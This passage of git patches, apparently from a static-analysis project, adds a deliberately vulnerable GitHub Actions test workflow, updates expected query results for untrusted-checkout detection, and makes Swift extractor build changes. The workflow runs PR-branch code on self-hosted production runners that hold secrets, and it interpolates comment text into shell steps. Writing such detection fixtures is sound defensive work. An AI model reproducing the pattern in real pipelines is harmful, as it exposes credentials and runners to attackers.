full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 400adb446d2..418aeeea059 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -5,12 +5,105 @@ edges | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| .github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | .github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index e69de29bb2d..3a001efbbe8 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85b93765324..6a629764adc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -301,9 +301,6 @@ edges | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | From b7aba1f081870794ddb7e3a439f9fd2906752f24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:05:58 +0200 Subject: [PATCH 0570/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0be2657c99e..91329e4f347 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.64 +version: 0.1.65 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ebdf6b364b2..1689480b56b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.64 +version: 0.1.65 groups: [actions, queries] suites: codeql-suites extractor: javascript From 524686ce37e14b397b29c3af9f79ba2c379f7aa3 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 8 Oct 2024 16:39:21 +0200 Subject: [PATCH 0571/1267] Swift: make extractor compilable with Swift 6 --- swift/extractor/SwiftExtractor.cpp | 5 +++-- swift/extractor/infra/SwiftTagTraits.h | 6 +++++- swift/extractor/translators/ExprTranslator.cpp | 2 +- swift/third_party/load.bzl | 7 +++---- 4 files changed, 12 insertions(+), 8 deletions(-) diff --git a/swift/extractor/SwiftExtractor.cpp b/swift/extractor/SwiftExtractor.cpp index dc9dcfcfa7d..b0de6a7a2a4 100644 --- a/swift/extractor/SwiftExtractor.cpp +++ b/swift/extractor/SwiftExtractor.cpp @@ -152,10 +152,10 @@ static std::unordered_set extractDeclarations( } std::vector comments; - if (primaryFile && primaryFile->getBufferID().hasValue()) { + if (primaryFile && primaryFile->getBufferID()) { auto& sourceManager = compiler.getSourceMgr(); auto tokens = swift::tokenize(compiler.getInvocation().getLangOptions(), sourceManager, - primaryFile->getBufferID().getValue()); + *primaryFile->getBufferID()); for (auto& token : tokens) { if (token.getKind() == swift::tok::comment) { comments.push_back(token); @@ -188,6 +188,7 @@ static std::unordered_set collectInputFilenames(swift::CompilerInst std::unordered_set sourceFiles; const auto& inOuts = compiler.getInvocation().getFrontendOptions().InputsAndOutputs; for (auto& input : inOuts.getAllInputs()) { + LOG_INFO("> {}", input.getFileName()); if (input.getType() == swift::file_types::TY_Swift && (!inOuts.hasPrimaryInputs() || input.isPrimary())) { sourceFiles.insert(input.getFileName()); diff --git a/swift/extractor/infra/SwiftTagTraits.h b/swift/extractor/infra/SwiftTagTraits.h index fc3c6343ce5..7d3a670be6a 100644 --- a/swift/extractor/infra/SwiftTagTraits.h +++ b/swift/extractor/infra/SwiftTagTraits.h @@ -175,6 +175,8 @@ MAP(swift::Expr, ExprTag) MAP(swift::LinearFunctionExtractOriginalExpr, LinearFunctionExtractOriginalExprTag) MAP(swift::LinearToDifferentiableFunctionExpr, LinearToDifferentiableFunctionExprTag) MAP(swift::ABISafeConversionExpr, AbiSafeConversionExprTag) // different acronym convention + MAP(swift::ActorIsolationErasureExpr, void) // TODO swift 6.0 + MAP(swift::UnreachableExpr, void) // TODO swift 6.0 MAP(swift::ExplicitCastExpr, ExplicitCastExprTag) MAP(swift::CheckedCastExpr, CheckedCastExprTag) MAP(swift::ForcedCheckedCastExpr, ForcedCheckedCastExprTag) @@ -200,7 +202,8 @@ MAP(swift::Expr, ExprTag) MAP(swift::ConsumeExpr, ConsumeExprTag) MAP(swift::MaterializePackExpr, MaterializePackExprTag) MAP(swift::SingleValueStmtExpr, SingleValueStmtExprTag) - + MAP(swift::ExtractFunctionIsolationExpr, void) // TODO swift 6.0 + MAP(swift::CurrentContextIsolationExpr, void) // TODO swift 6.0 MAP(swift::Decl, DeclTag) MAP(swift::ValueDecl, ValueDeclTag) MAP(swift::TypeDecl, TypeDeclTag) @@ -332,6 +335,7 @@ MAP(swift::TypeBase, TypeTag) MAP(swift::PackExpansionType, PackExpansionTypeTag) MAP(swift::PackElementType, PackElementTypeTag) MAP(swift::TypeVariableType, void) // created during type checking and only used for constraint checking + MAP(swift::ErrorUnionType, void) // TODO swift 6.0 MAP(swift::SugarType, SugarTypeTag) MAP(swift::ParenType, ParenTypeTag) MAP(swift::TypeAliasType, TypeAliasTypeTag) diff --git a/swift/extractor/translators/ExprTranslator.cpp b/swift/extractor/translators/ExprTranslator.cpp index ce8da08a12e..cfdc7d8fae0 100644 --- a/swift/extractor/translators/ExprTranslator.cpp +++ b/swift/extractor/translators/ExprTranslator.cpp @@ -378,7 +378,7 @@ codeql::KeyPathExpr ExprTranslator::translateKeyPathExpr(const swift::KeyPathExp for (const auto& component : expr.getComponents()) { entry.components.push_back(emitKeyPathComponent(component)); } - if (auto rootTypeRepr = expr.getRootType()) { + if (auto rootTypeRepr = expr.getExplicitRootType()) { auto keyPathType = expr.getType()->getAs(); CODEQL_EXPECT_OR(return entry, keyPathType, "KeyPathExpr must have BoundGenericClassType"); auto keyPathTypeArgs = keyPathType->getGenericArgs(); diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index f9f46e5f410..a893b59d2dc 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -1,11 +1,10 @@ load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") 